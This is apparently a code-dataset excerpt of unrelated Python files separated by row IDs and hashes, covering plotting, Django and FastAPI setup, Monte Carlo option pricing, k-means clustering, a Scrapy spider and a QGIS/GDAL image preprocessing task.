        newareaWeightedAgeBaseline.append(np.sum(temp1areaWeightedAgeBaseline)/numIter*1000.)
        newtotalTimeBaseline.append(np.sum(temp1TotalTimeBaseline)/numIter)
        newcoverageAreaSensSelec.append(np.sum(temp1coverageAreaSensSelec)/numIter/areaR*100)
        newareaWeightedAgeSensSelec.append(np.sum(temp1areaWeightedAgeSensSelec)/numIter*1000.)
        newselectedSensorsSensSelec.append(np.sum(temp1selectedSensorsSensSelec)/numIter)
        newtotalTimeSensSelec.append(np.sum(temp1TotalTimeSensSelec)/numIter)
        #
        # newcoverageAreaAgeMin.append(np.sum(temp1coverageAreaAgeMin)/numIter/areaR)
        # newareaWeightedAgeAgeMin.append(np.sum(temp1areaWeightedAgeAgeMin)/numIter*1000.)
        # newselectedSensorsAgeMin.append(np.sum(temp1selectedSensorsAgeMin)/numIter)
    # --- Plots: age, coverage, running time ---
    plt.clf()
    plt.plot(N , areaWeightedAgeBaseline, 'b' , label='Baseline')
    plt.plot(N , newareaWeightedAgeBaseline, 'b--', label='Sampling Baseline')
    plt.plot(N , areaWeightedAgeSensSelec, 'r',label='Sensor Selection')
    plt.plot(N , newareaWeightedAgeSensSelec, 'r--',label='Sampling Sensor Selection')
    #plt.plot(N , areaWeightedAgeAgeMin, label='Age Minimization')
    #plt.title('Area weighted age as a function of the number of selected sensors', fontsize=12)
    plt.legend()
    plt.grid()
    #plt.yscale('log')
    plt.xlabel('Number of available sensors N', fontsize=12)
    plt.ylabel('Normalized average weighted age [msec]', fontsize=10)
    plt.savefig('oldSampledAge_N=14_19.eps')
    plt.savefig('oldSampledAge_N=14_19.pdf')
    plt.clf()
    plt.plot(N , coverageAreaBaseline, 'b', label='Baseline')
    plt.plot(N , newcoverageAreaBaseline, 'b--', label='Sampling Baseline')
    plt.plot(N , coverageAreaSensSelec, 'r',label='Sensor Selection')
    plt.plot(N , newcoverageAreaSensSelec, 'r--',label='Sampling Sensor Selection')
    #plt.plot(N , coverageAreaAgeMin, label='Age Minimization')
    #plt.title('Coverage Area as a function of the number of selected sensors', fontsize=12)
    plt.legend()
    plt.grid()
    plt.xlabel('Number of available sensors N', fontsize=12)
    plt.ylabel('Coverage Area [%]', fontsize=10)
    plt.savefig('oldSampledCov_N=14_19.eps')
    plt.savefig('oldSampledCov_N=14_19.pdf')
    plt.clf()
    plt.plot(N , totalTimeBaseline, 'b', label='Baseline')
    plt.plot(N , newtotalTimeBaseline, 'b--', label='Sampling Baseline')
    plt.plot(N , totalTimeSensSelec, 'r',label='Sensor Selection')
    plt.plot(N , newtotalTimeSensSelec, 'r--',label='Sampling Sensor Selection')
    #plt.plot(N , coverageAreaAgeMin, label='Age Minimization')
    plt.legend()
    plt.grid()
    plt.xlabel('Number of available sensors N', fontsize=12)
    plt.ylabel('Algorithm running time [sec]', fontsize=10)
    plt.savefig('oldSampledAlgoRunTime_N=14_19.eps')
    plt.savefig('oldSampledAlgoRunTime_N=14_19.pdf')
if __name__ == "__main__":
main() |
23,122 | 83a14fab96476430b9fa5c120a7332e8008363ce | from django.shortcuts import render
from django.views import generic
from .models import *
from Services.models import ServiceItems
# Create your views here.
class Cases(generic.TemplateView):
    """Case list page: all case categories plus all cases, newest first."""

    template_name = "Cases/index.html"

    def get_context_data(self, **kwargs):
        # Build on the parent context instead of discarding it -- Django
        # convention for get_context_data overrides; keeps standard keys
        # such as 'view' available to the template.
        context = super().get_context_data(**kwargs)
        # (Key spelling 'case_categoryes' kept: templates depend on it.)
        context['case_categoryes'] = CaseCategory.objects.all()
        context['cases'] = CaseItems.objects.all().order_by('-created')
        return context
class single_case(generic.DetailView):
    """Detail page for one case, plus related cases and a services teaser."""

    template_name = "Cases/single-case.html"
    # NOTE(review): 'cases' and 'initial' are not used by DetailView or by
    # get_context_data below; 'initial' belongs to form views.  They look like
    # leftovers -- kept as-is in case templates or subclasses reference them.
    cases = CaseItems.objects.all().order_by('-created')
    model = CaseItems
    context_object_name = 'case'
    initial = {'key': 'value'}

    def get_context_data(self, **kwargs):
        # Three most recent services and cases for the sidebar blocks.
        center_services = ServiceItems.objects.order_by('-id')[:3]
        related_cases = CaseItems.objects.all().order_by('-created')[:3]
        context = super(single_case, self).get_context_data(**kwargs)
        context['related_cases'] = related_cases
        context['center_services'] = center_services
        return context
23,123 | ead3891524defcbe8f010ebd3ef868a852927c94 |
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import json
# Per-run tables, one column per player id (prsraw is indexed run[player_id]
# below).  NOTE(review): eps/gps presumably hold EP/GP values -- confirm.
epsraw = np.loadtxt('eps.txt',delimiter=',')
gpsraw = np.loadtxt('gps.txt',delimiter=',')
prsraw = np.loadtxt('prs.txt',delimiter=',')
# Player roster: list of dicts with at least 'id' and 'class' keys.
with open('players.txt', 'r') as playersfile :
    players = json.load(playersfile)
# Bucket player ids by character class.  A lookup table replaces the long
# if/elif chain; players with an unrecognised class are ignored, as before.
druidids = []
hunterids = []
mageids = []
paladinids = []
priestids = []
rogueids = []
shamanids = []
warlockids = []
warriorids = []
_ids_by_class = {
    'druid': druidids,
    'hunter': hunterids,
    'mage': mageids,
    'paladin': paladinids,
    'priest': priestids,
    'rogue': rogueids,
    'shaman': shamanids,
    'warlock': warlockids,
    'warrior': warriorids,
}
for player in players:
    bucket = _ids_by_class.get(player['class'])
    if bucket is not None:
        bucket.append(player['id'])
druidprs = []
hunterprs = []
mageprs = []
paladinprs = []
priestprs = []
rogueprs = []
shamanprs = []
warlockprs = []
warriorprs = []
# For every player of each class, collect that player's PR value from every
# run (one series per player).  One driver loop replaces nine copy-pasted
# loops; class order matches the original (druid ... warrior).
for _id_list, _pr_list in ((druidids, druidprs), (hunterids, hunterprs),
                           (mageids, mageprs), (paladinids, paladinprs),
                           (priestids, priestprs), (rogueids, rogueprs),
                           (shamanids, shamanprs), (warlockids, warlockprs),
                           (warriorids, warriorprs)):
    for player_id in _id_list:
        _pr_list.append([run[player_id] for run in prsraw])

print (hunterprs)
def _class_figure(class_prs):
    # One figure per class: one line per player's PR series, y fixed to 0-20.
    fig, ax = plt.subplots()
    for series in class_prs:
        ax.plot(series)
    ax.set_ylim([0, 20])
    return fig

figdruids = _class_figure(druidprs)
fighunters = _class_figure(hunterprs)
figmages = _class_figure(mageprs)
figpaladins = _class_figure(paladinprs)
figpriests = _class_figure(priestprs)
figrogues = _class_figure(rogueprs)
figshamans = _class_figure(shamanprs)
figwarlocks = _class_figure(warlockprs)
figwarriors = _class_figure(warriorprs)
figdruids.savefig('./graphics/druids.png')
# BUG FIX: the original saved `fighunters` to mages.png (copy-paste error),
# so mages.png showed hunter data and the mages figure was never written.
figmages.savefig('./graphics/mages.png')
fighunters.savefig('./graphics/hunters.png')
figpaladins.savefig('./graphics/paladins.png')
figpriests.savefig('./graphics/priests.png')
figrogues.savefig('./graphics/rogues.png')
figshamans.savefig('./graphics/shamans.png')
figwarlocks.savefig('./graphics/warlocks.png')
figwarriors.savefig('./graphics/warriors.png')
|
23,124 | 2f9fdbf375bfd2b8f48fb998532199bbf04f8ab4 | # You can choose to import only parts from a module, by using the from keyword.
# The module named mymodule has one function and one dictionary:
# Import only the person1 dictionary from the module:
from mymodule import person1

# Only the imported name is bound here; mymodule's other members are not.
print(person1["age"])
|
23,125 | cd1c7ef278698fedf01ee13d2c5db00fb8bfe72f | import numpy as np
import numpy.random as npr
M = 50        # time steps per simulated path (dt = T / M below)
I = 10000     # number of Monte Carlo paths
sigma = 0.25  # volatility used in the GBM simulation
def standard_normal_dist(M, I, anti_paths=True, mo_match=True):
    """Draw an (M+1, I) array of standard-normal variates for path simulation.

    anti_paths: use antithetic variates -- the second half of the columns is
        the negation of the first half (I is effectively rounded down to an
        even count).
    mo_match: moment matching -- rescale the sample to mean 0, std 1.
    """
    # Truthiness tests instead of the original `is True` identity checks
    # (PEP 8: never compare to True with `is`/`==`); the old code silently
    # took the wrong branch for truthy non-bool flags such as 1.
    if anti_paths:
        half = npr.standard_normal((M + 1, int(I / 2)))
        sn = np.concatenate((half, -half), axis=1)
    else:
        sn = npr.standard_normal((M + 1, I))
    if mo_match:
        sn = (sn - sn.mean()) / sn.std()
    return sn
def monte_carlo_brownian_motion(S0, K, r, T, option_type):
    """Price a European call/put by Monte Carlo under geometric Brownian motion.

    Uses the module-level globals M (steps), I (paths) and sigma (volatility);
    returns a human-readable string with the discounted option value.
    """
    dt = T / M
    paths = np.zeros((M + 1, I))
    paths[0] = S0
    shocks = standard_normal_dist(M, I)
    # Step the GBM forward: S_t = S_{t-1} * exp(drift + diffusion * Z_t).
    for step in range(1, M + 1):
        paths[step] = paths[step - 1] * np.exp((r - 0.5 * sigma ** 2) * dt + sigma * np.sqrt(dt) * shocks[step])
    # Terminal payoff depends on the option side.
    if option_type.lower() == 'call':
        payoff = np.maximum(paths[-1] - K, 0)
    else:
        payoff = np.maximum(K - paths[-1], 0)
    value = np.exp(-r * T) * np.mean(payoff)
    return option_type + ' option value: ' + str(value)
parameters = {}

def _read_float(prompt, label):
    """Prompt for a float; record it (or the 'ERROR' sentinel) in parameters."""
    try:
        value = float(input(prompt))
    except ValueError:
        # Was a bare `except:` in the original, which also swallowed
        # KeyboardInterrupt/SystemExit; only parse failures belong here.
        value = 'ERROR'
        print('ERROR: Input value needs to be a number')
    parameters[label] = value
    return value

# Gather the four numeric pricing inputs (prompts unchanged).
S0 = _read_float('Initial Price of an underlying product(example 100): ', 'Initial Price')
K = _read_float('Strike price(example 120): ', 'Strike Price')
r = _read_float('Risk Free Interest Rate(example 0.05): ', 'Risk Free Interest Rate')
T = _read_float('Time Horizon in years(example 2): ', 'Time Horizon')

# Option side: Yes -> call, No -> put, anything else -> error sentinel.
option_type = str(input('Call[Yes]/Put[No](example Yes): '))
if option_type.lower() == 'yes':
    option_type = 'call'
elif option_type.lower() == 'no':
    option_type = 'put'
else:
    option_type = 'ERROR'
    print('ERROR: Choose either Yes or No')
parameters['Option Type'] = option_type
def compute():
    """Print the valuation summary unless any input failed to parse."""
    if 'ERROR' in parameters.values():
        return  # at least one input was invalid -- nothing to compute
    print('\n' + 'Option Valuation with following parameters:')
    for name, value in parameters.items():
        print(name + ':', value)
    print('\n' + monte_carlo_brownian_motion(S0, K, r, T, option_type))

compute()
|
23,126 | 0c9fd192c103a638e3b114357dfd5c3a7d9ca116 | import dataclasses
from datetime import datetime
from enum import Enum
from enum import auto
from typing import Any
from typing import List
from typing import Optional
import dateutil.parser
from sora.utils import from_bool
from sora.utils import from_datetime
from sora.utils import from_int
from sora.utils import from_str
from sora.utils import to_class
@dataclasses.dataclass(frozen=True)
class WorkId:
    """Unique ID assigned to an anime work managed by the API."""
    value: int

    def __post_init__(self) -> None:
        # Validate the wrapped value is an int (from_int raises otherwise).
        from_int(self.value)
@dataclasses.dataclass(frozen=True)
class Title:
    """Title of an anime work."""
    value: str

    def __post_init__(self) -> None:
        # Validate the wrapped value is a str (from_str raises otherwise).
        from_str(self.value)
@dataclasses.dataclass(frozen=True)
class WorkLight:
    """Lightweight view of a work: its id and its title."""
    work_id: WorkId
    title: Title

    def to_dict(self) -> dict:
        """Serialize to the wire format {"id": int, "title": str}."""
        return {
            "id": self.work_id.value,
            "title": self.title.value,
        }

    @staticmethod
    def from_dict(work_light_dict: dict) -> "WorkLight":
        """Build a WorkLight from its wire-format dict."""
        assert isinstance(work_light_dict, dict)
        work_id = WorkId(work_light_dict.get("id"))
        title = Title(work_light_dict.get("title"))
        return WorkLight(work_id, title)
@dataclasses.dataclass
class MultiWorkLight:
    """Ordered, type-checked collection of WorkLight entries."""
    _list: List[WorkLight] = dataclasses.field(default_factory=list)

    def append(self, work_light: WorkLight) -> None:
        """Append *work_light*; reject anything that is not a WorkLight."""
        if not isinstance(work_light, WorkLight):
            raise TypeError("data is not work_light")
        self._list.append(work_light)

    def to_dict(self) -> list:
        """Serialize every element via WorkLight.to_dict."""
        return [entry.to_dict() for entry in self._list]
|
23,127 | 9570163a132b3a42fed6dcd3af440737276d57bc | #!/usr/bin/python
# -*- coding: utf-8 -*-
import csv
import math
from scipy.integrate import quad
def ellipseArea(a, b, angle):
    """Area swept inside the ellipse (semi-axes a, b) from 0 up to *angle*."""
    quarter = math.pi / 2
    swept = 0
    n_quarters = 0
    # Peel off whole quadrants one at a time (each contributes a*b*pi/4);
    # repeated subtraction keeps the residual angle bit-identical to the
    # original implementation.
    while angle > quarter:
        swept += a * b * math.pi / 4
        angle -= quarter
        n_quarters += 1
    if n_quarters % 2:
        # residual sector starts at a horizontal edge
        swept += .5 * a * b * math.atan(a * math.tan(angle) / b)
    else:
        # residual sector starts at a vertical edge
        swept += a * b * math.pi / 4 - \
            .5 * a * b * math.atan(a * math.tan(math.pi / 2 - angle) / b)
    return swept
# Integrand for the ellipse arc length: |r'(t)| with r(t) = (a cos t, b sin t).
# Integrating it from 0 to 2*pi yields the full perimeter.
def ellipseArcFunction(t, params):
    a, b = params
    sin_t = math.sin(t)
    cos_t = math.cos(t)
    return math.sqrt(a * a * sin_t * sin_t + b * b * cos_t * cos_t)
def ellipseArc(a, b, angle):
    """Arc length of the ellipse (semi-axes a, b) from t = 0 to t = *angle*,
    by numerical quadrature of the speed integrand."""
    length, _abserr = quad(ellipseArcFunction, 0, angle, args=([a, b],))
    return length
# Arc length and area of the ellipse slice bounded by *rotation* and
# rotation + angle (both measured as parameter angles).
def calcEllipse(a, b, angle, rotation):
    end = angle + rotation
    arc = ellipseArc(a, b, end) - ellipseArc(a, b, rotation)
    area = ellipseArea(a, b, end) - ellipseArea(a, b, rotation)
    return [arc, area]
# Project the slice angles of a circle tilted by viewAngle toward the viewer.
# Returns [projected central angle, projected rotation angle], both in [0, 2*pi).
def projectAngle(viewAngle, centralAngle, rotationAngle):
    two_pi = math.pi * 2
    # Slice endpoints on the unit circle.
    x_start = math.cos(rotationAngle)
    y_start = math.sin(rotationAngle)
    x_end = math.cos(rotationAngle + centralAngle)
    y_end = math.sin(rotationAngle + centralAngle)
    # Foreshortening squashes only the y components.
    squash = math.sin(viewAngle)
    rotationProj = math.atan2(y_start * squash, x_start)
    centralProj = math.atan2(y_end * squash, x_end) - rotationProj
    # Avoid the pi -> -pi discontinuity across the negative x axis and keep
    # both angles in [0, 2*pi).
    if rotationProj < 0:
        rotationProj += two_pi
    if centralProj < 0:
        centralProj += two_pi
    return [centralProj, rotationProj]
def main():
    """Sweep view angles, slice angles and rotations; write the projected
    angles and normalized arc/area ratios of each slice to a CSV file."""
    # BUG FIX: csv.writer requires a text-mode file opened with newline=''
    # on Python 3; the original 'wb' (a Python 2 idiom) raises a TypeError.
    with open('3dpiepredictions.csv', 'w', newline='') as outFile:
        csvOut = csv.writer(outFile)
        csvOut.writerow(['viewAngle', 'aspect', 'rotation', 'rotationProjected', 'angle', 'angleProjected', 'arc', 'area'])
        for viewAngle in range(90, 10, -15):
            viewRadians = math.radians(viewAngle)
            # Tilting by viewAngle turns the circle into an ellipse with this aspect.
            aspect = math.sin(viewRadians)
            a = 1.
            b = aspect
            ellipseTotal = calcEllipse(a, b, math.pi*2, 0)
            for centralAngle in [5, 10, 20, 30, 45, 60, 75, 90, 135, 180]:
                centralRadians = math.radians(centralAngle)
                for rotation in range(360):
                    angleProjected, rotationProjected = projectAngle(viewRadians, centralRadians, math.radians(rotation))
                    ellipse = calcEllipse(a, b, angleProjected, rotationProjected)
                    csvOut.writerow([viewAngle, aspect, rotation, math.degrees(rotationProjected), centralAngle, math.degrees(angleProjected), ellipse[0]/ellipseTotal[0], ellipse[1]/ellipseTotal[1]])
if __name__ == "__main__":
# This will be called only when the Python file is invoked as a script.
main()
|
23,128 | 08001ab43936a8c7bd57d274b6ff8f874598fde6 | text = "X-DSPAM-Confidence: 0.8475";
# Extract the numeric confidence that follows the header's colon and parse it
# as a float.  BUG FIX: the original located the end of the number by
# searching for the literal digit '5', which only works for this exact value;
# slicing from the colon works for any confidence string.
valueText = text[text.find(':') + 1:].strip()
floatStr = float(valueText)
print(floatStr)
|
23,129 | 721a4291b22de323b902a9b59ec911a4d78d807b | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import multiprocessing as mp
import time
import kmeans_par
import kmeans_seq
from itertools import repeat
# print("Number of processors: ", mp.cpu_count())
# generate test data
numIter = 10
# n = 2000
# cluster1 = np.random.randn(n, 2) + [0, 0]
# cluster2 = np.random.randn(n, 2) + [0, 7.5]
# cluster3 = np.random.randn(n, 2) + [7.5, 0]
# cluster4 = np.random.randn(n, 2) + [7.5, 7.5]
#
# data = np.concatenate((cluster1, cluster2, cluster3, cluster4))
# Pre-generated 2-D clustering data (four Gaussian blobs, see above).
data = np.load('clusteringData2000.npy')
data = pd.DataFrame(data)
numFeatures = data.shape[1]
numPoints = data.shape[0]
"""Initialize centroids randomly"""
numCentroids = 4
centroids = np.array(data.sample(n=numCentroids))
centroids_seq = centroids.copy()
centroids_pool = centroids.copy()
"""Plot initial data and centroids"""
data.plot.scatter(x=0, y=1)
# Red crosses mark the true blob centers used to generate the data.
plt.scatter(x=[0, 0, 7.5, 7.5], y=[0, 7.5, 0, 7.5], c='r', marker='+', s=100)
# plt.scatter(x=centroids[:, 0], y=centroids[:, 1], c='r', marker='+', s=100)
plt.show()
dist = np.ndarray((data.shape[0], numCentroids))
""" Initialise Global Error"""
GlobalError =100.0
Num_iterations=0
# NOTE(review): kmeans_par, start_par, numIter and `dist` are unused below --
# the parallel comparison path appears to have been removed.
start_par = time.time()
print('Running Sequential K Means')
""""Sequential implementation"""
start_seq = time.time()
# Lloyd iterations: assign points, recompute centroids, until movement is tiny.
while GlobalError > 0.0001:
    start_time = time.time()
    temp_centroids=centroids_seq.copy()
    centroid_assignments_seq = kmeans_seq.assign_centroid(data, centroids_seq)
    elapsed_part1 = (time.time() - start_time)
    # kmeans_seq.plot_clusters(data, centroid_assignments_seq, centroids_seq, title='Seq '+str(iteration))
    start_time = time.time()
    centroids_seq = kmeans_seq.update_centroids(data, centroid_assignments_seq, numCentroids, numFeatures)
    GlobalError=kmeans_seq.update_global_error(temp_centroids, centroids_seq)
    Num_iterations=Num_iterations+1
    elapsed_part2 = (time.time() - start_time)
elapsed_seq = (time.time() - start_seq)
kmeans_seq.plot_clusters(data, centroid_assignments_seq, centroids_seq, title='K Means Seq')
print('--------------------')
# print('pool time:', elapsed_pool)
print('sequential time:', elapsed_seq)
print('Number of iterations',Num_iterations)
print('Global Error', GlobalError)
|
23,130 | cf617033c808522a4c7eba3d3616065b6e6d1d3a | from fastapi import FastAPI, Depends, status, Response, HTTPException
import schemas
import models
from database import engine, SessionLocal, get_db
from sqlalchemy.orm import Session
from typing import List
from hashing import Hash
from routers import blog, user, authentication
app = FastAPI()
# Create all ORM tables up front (no-op for tables that already exist).
models.Base.metadata.create_all(engine)
# Mount the per-domain routers on the application.
app.include_router(blog.router)
app.include_router(user.router)
app.include_router(authentication.router)
|
23,131 | e89ffbf0b92d82f7a84d53436a17926c308261f8 | # -*- coding: utf-8 -*-
import scrapy
import re
from scrapy_demo3.items import NESAItem
class NesaSpider(scrapy.Spider):
    """Scrape name, position and photo for each person on the NESA lab page."""
    name = 'nesa'
    allowed_domains = ['nesa.zju.edu.cn']
    start_urls = ['http://nesa.zju.edu.cn/webpage/people.html']

    def parse(self, response):
        # One card per person; each card yields one item.
        for card in response.xpath('//div[@class="view view-ninth"]'):
            item = NESAItem()
            item['name'] = card.xpath('.//h2/text()').extract_first()
            item['position'] = card.xpath('.//p/text()').extract_first()
            # Photo paths are site-relative ("../..."): rewrite every "../"
            # to the absolute host.  NOTE(review): the replacement inserts no
            # '/' separator -- confirm the actual src format produces valid URLs.
            raw_src = card.xpath('.//img/@src').extract_first()
            item['img_src'] = re.sub(r'\.\./', r'http://nesa.zju.edu.cn', raw_src)
            yield item
|
23,132 | 9d852bed40bb61a96e5acdd9b711f9bc8c1bc1da | import timeit
# Time (3 repeats, one execution each) a brute-force search over multiples of
# n's largest prime factor, comparing prime-exponent vectors against n's.
# The benchmarked code is a string literal and is left byte-identical.
res = timeit.repeat(
'''
n = 999999998
if n == 1:
    print(1)
    exit()
def factor_dict(n):
    d={}
    sqrtN = int(pow(n, 0.5)) + 1
    for i in range(2, sqrtN):
        while not n % i:
            if i in d: d[i] += 1
            else: d[i] = 1
            n //= i
    if n != 1:
        d[n] = 1
    return d
factor_n = factor_dict(n)
sqrtN = int(pow(n, 0.5)) + 1
maxDiv = max(factor_n.keys())
for i in range(maxDiv, 10 ** 9, maxDiv):
    factor_cur = factor_dict(i)
    for k in factor_cur:
        factor_cur[k] *= i
    for k in factor_n:
        if k not in factor_cur:
            factor_cur[k] = 0
    for k in factor_n:
        factor_cur[k] -= factor_n[k]
    len_f_c = len(factor_cur)
    am = 0
    for k in factor_cur:
        if factor_cur[k] >= 0: am += 1
    if am == len_f_c:
        print(i)
        break
'''
    , number=1, repeat=3)
# Three wall-clock timings in seconds, one per repeat.
print(res)
23,133 | 4d5632b5957264b9adeb2afb95d2b30cdfe918b8 | from sklearn import tree
#Training Data
# Each sample is (weight in grams, texture flag); see inline legends.
features = [[140,1],[130,1],[150,0],[170,1]]#0 for bumpy, 1 for smooth
labels = [0,0,1,1] #0 for apple , 1 for orange
# Fit a decision tree on the four samples and classify one new fruit.
clf = tree.DecisionTreeClassifier()
clf = clf.fit(features,labels)
print(clf.predict([[150,0]]))
|
23,134 | 2dbd5b95c7a8bd3ca1c68a7279f7adc9a762e6b3 |
class Car:
    """Toy car model: speed, gear, color and fuel ratio with setter methods."""

    def __init__(self, speed=0, gear=1, color="white", fuelratio=0):
        self.__speed = speed
        self.__gear = gear
        self.__color = color
        self.__fuelratio = fuelratio

    def setSpeed(self, speed):
        self.__speed = speed

    def setGear(self, gear):
        self.__gear = gear

    def setColor(self, color):
        self.__color = color

    def setFuelratio(self, fuelratio):
        self.__fuelratio = fuelratio

    def __str__(self):
        # Render as "(speed, gear, color, fuelratio)".
        return '(%d, %d, %s, %d)' % (self.__speed, self.__gear,
                                     self.__color, self.__fuelratio)

    def calcFuel(self, distance):
        # Remember the queried distance, then return the fuel needed for it.
        # NOTE(review): divides by fuelratio, which defaults to 0 -- callers
        # must set it first or this raises ZeroDivisionError.
        self.__distance = distance
        return self.__distance / self.__fuelratio
# Build a sample car and query the fuel needed for 100 distance units.
myCar = Car()
myCar.setSpeed(3);
myCar.setGear(100);
myCar.setColor('Black')
myCar.setFuelratio(10)
# The Korean text reads roughly: "the amount of fuel used is ...".
print(myCar, " 사용하는 연료량은", myCar.calcFuel(100),"임")
|
23,135 | 9a7c235764edaafd2bbaa829babab09409b4e2c4 | from qgis.core import (QgsApplication, QgsTask, QgsMessageLog, Qgis)
import os
import subprocess
import time
import datetime
from osgeo import gdal
from osgeo import ogr
import numpy as np
from .image import Image
from .place import Place
from .classifier import Classifier
from .. import Lumberjack
class PreProcessTask(QgsTask):
    """QGIS background task that discovers Landsat imagery on disk and
    pre-processes it: crop each band to a reference extent, merge the bands
    into one multi-band GTiff, then derive per-image features.

    NOTE(review): run()/finished() raise NotImplementedError, so this class
    is meant to be subclassed.  `self.features` (used by pre_process_images)
    is never assigned here — presumably a subclass sets it; confirm.
    """

    def obtain_places(self, root_directory):
        """Scan `root_directory` and build the Place/Image structure.

        Each sub-directory of the root becomes a Place; each sub-directory
        of a place holds one Landsat image (its band files), while loose
        files in the place directory are matched by filename suffix to the
        extent raster, the vector shapefile and the mask.  Returns the list
        of populated Place objects.
        """
        # Iterates through the root directory searching the files needed to
        # do the processing.
        # Creates an structure with the Place and Image data objects so it's
        # easy to iterate, access files and improves readability
        suf_b1 = Lumberjack.BAND_SUFFIX.format("1")
        suf_metadata = Lumberjack.IMAGE_METADATA_SUFFIX
        root_directory = os.path.normpath(root_directory)
        places = []
        for place_directory in os.scandir(root_directory):
            if (place_directory.is_dir()):
                place = Place(place_directory.path)
                for img_directory_or_file in os.scandir(place.directory_path):
                    if (img_directory_or_file.is_dir()):
                        image_directory = str(img_directory_or_file.path)
                        image = Image(image_directory)
                        for image_subfile in os.scandir(image_directory):
                            image_subfile_path = str(image_subfile.path)
                            # Band-1 file pins down the image's base name.
                            if (image_subfile_path[-(len(suf_b1)):] == suf_b1):
                                # image.base_name = image_subfile_path[-48:-8]
                                image.base_name = (os.path.split(image_subfile_path)[1])[:-(len(suf_b1))]
                            if (image_subfile_path[-(len(suf_metadata)):] == suf_metadata):
                                image.metadata_file = image_subfile_path
                        place.images.append(image)
                    elif (img_directory_or_file.is_file()):
                        file_path = str(img_directory_or_file.path)
                        if (file_path[-(len(Lumberjack.EXTENSION_FILE_SUFFIX)):] == Lumberjack.EXTENSION_FILE_SUFFIX):
                            place.extension_file_path = file_path
                        elif (file_path[-(len(Lumberjack.SHAPEFILE_SUFFIX)):] == Lumberjack.SHAPEFILE_SUFFIX):
                            place.vector_file_path = file_path
                        elif (file_path[-(len(Lumberjack.MASK_SUFFIX)):] == Lumberjack.MASK_SUFFIX):
                            place.mask = file_path
                places.append(place)
        return places

    def calculate_extension(self, extension_file_path):
        """Return the bounding box (minx, maxy, maxx, miny) of the given
        raster, derived from its geotransform and pixel dimensions."""
        extension_dataset = gdal.Open(extension_file_path, gdal.GA_ReadOnly)
        geoTransform = extension_dataset.GetGeoTransform()
        minx = geoTransform[0]
        maxy = geoTransform[3]
        maxx = minx + geoTransform[1] * extension_dataset.RasterXSize
        # geoTransform[5] is the (negative) pixel height, hence the addition.
        miny = maxy + geoTransform[5] * extension_dataset.RasterYSize
        return minx, maxy, maxx, miny

    def crop_images(self, file_name_band, file_name_crop, minx, maxy, maxx, miny):
        """Crop every band raster to the given window via gdal_translate.

        NOTE(review): shell=True with interpolated paths is only safe for
        trusted local filenames — confirm inputs are never user-controlled.
        """
        # Crops all images according to the extension.
        for i in range(1, Lumberjack.BAND_TOTAL + 1):
            # Crop image to extension
            command_translate = ("gdal_translate -projwin {} {} {} {} -ot Int16 -of GTiff \"{}\" \"{}\"")
            subprocess.call(command_translate.format(
                minx, maxy, maxx, miny, file_name_band.format(i),
                file_name_crop.format(i)), stdout=open(os.devnull, 'wb'), shell=True)

    def merge_images(self, files, file_name_merged, bands_amount, data_type):
        """Stack the bands of all `files` into one GTiff at
        `file_name_merged`, copying geotransform/projection from the first
        file and preserving each band's description.

        NOTE(review): the output dataset is never explicitly flushed/closed;
        GDAL writes on garbage collection — confirm this is intentional.
        """
        bands_acum = 0
        output_dataset = None
        print("File Name Merged: " + file_name_merged)
        dataset = gdal.Open(files[0], gdal.GA_ReadOnly)
        driver = gdal.GetDriverByName('GTiff')
        output_dataset = driver.Create(
            file_name_merged, dataset.RasterXSize, dataset.RasterYSize, bands_amount, data_type)
        output_dataset.SetGeoTransform(dataset.GetGeoTransform())
        output_dataset.SetProjection(dataset.GetProjection())
        dataset = None
        for i, file_path in enumerate(files):
            dataset = gdal.Open(file_path, gdal.GA_ReadOnly)
            for j in range(dataset.RasterCount):
                bands_acum += 1
                band_read = dataset.GetRasterBand(j+1).ReadAsArray()
                outband = output_dataset.GetRasterBand(bands_acum)
                outband.SetDescription(dataset.GetRasterBand(j+1).GetDescription())
                outband.WriteArray(band_read)

    def calculate_total_features(self, files):
        """Return the total band count across all the given raster files."""
        total = 0
        for file in files:
            dataset = gdal.Open(file, gdal.GA_ReadOnly)
            total += dataset.RasterCount
        return total

    def pre_process_images(self, places):
        """For every image of every place: crop bands to the place extent,
        merge them into one file, delete the per-band crops, then run each
        configured feature on the merged raster."""
        for place in places:
            minx, maxy, maxx, miny = self.calculate_extension(
                place.extension_file_path)
            for image in place.images:
                # image represent each landsat image (a folder with the bands)
                print("Landsat image directory: {}".format(image.path))
                file_name_band = os.path.join(image.path, "{}{}".format(image.base_name, Lumberjack.BAND_SUFFIX))
                file_name_crop = "{}{}".format(file_name_band[:-4], Lumberjack.CROP_SUFFIX)
                file_name_merged = os.path.join(image.path, "{}{}".format(image.base_name, Lumberjack.MERGED_SUFFIX))

                # Crop all bands according to the extent file
                self.crop_images(file_name_band, file_name_crop, minx, maxy, maxx, miny)

                # Merge all bands
                files_to_merge = []
                for i in range(1, Lumberjack.BAND_TOTAL + 1):
                    files_to_merge.append(file_name_crop.format(i))
                self.merge_images(files_to_merge, file_name_merged, Lumberjack.BAND_TOTAL, gdal.GDT_Int16)

                # Per-band crops are temporary; remove them after the merge.
                for file in files_to_merge:
                    if os.path.exists(file):
                        os.remove(file)
                for feature in self.features:
                    feature.execute(file_name_merged, image)

    def __init__(self, description, task):
        super().__init__(description, task)
        # Populated by subclasses when run() fails, re-raised in finished().
        self.exception = None

    def run(self):
        """Here you implement your heavy lifting.
        Should periodically test for isCanceled() to gracefully abort.
        This method MUST return True or False.
        Raising exceptions will crash QGIS, so we handle them
        internally and raise them in self.finished
        """
        raise NotImplementedError("Subclasses mut override run()")

    def finished(self, result):
        """
        This function is automatically called when the task has completed
        (successfully or not).
        You implement finished() to do whatever follow-up stuff should happen
        after the task is complete. finished is always called from the main
        thread, so it's safe to do GUI operations and raise Python
        exceptions here.
        result is the return value from self.run.
        """
        raise NotImplementedError("Subclasses mut override finished()")

    def cancel(self):
        """Log the cancellation, then defer to QgsTask.cancel()."""
        QgsMessageLog.logMessage(
            'Task "{name}" was canceled'.format(name=self.description()),
            Lumberjack.MESSAGE_CATEGORY, Qgis.Info)
        super().cancel()
|
23,136 | a9ab7eb9f144dffad8e13174dccc32104e38dda2 | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 15 07:56:12 2019
@author: Pups
"""
from django.core.management.base import BaseCommand, CommandError
from Page_1.models import ProductCategory
class Command(BaseCommand):
    """Management command that dumps every ProductCategory to stdout."""

    def handle(self, *args, **options):
        categories = ProductCategory.objects.all()
        print(categories)
|
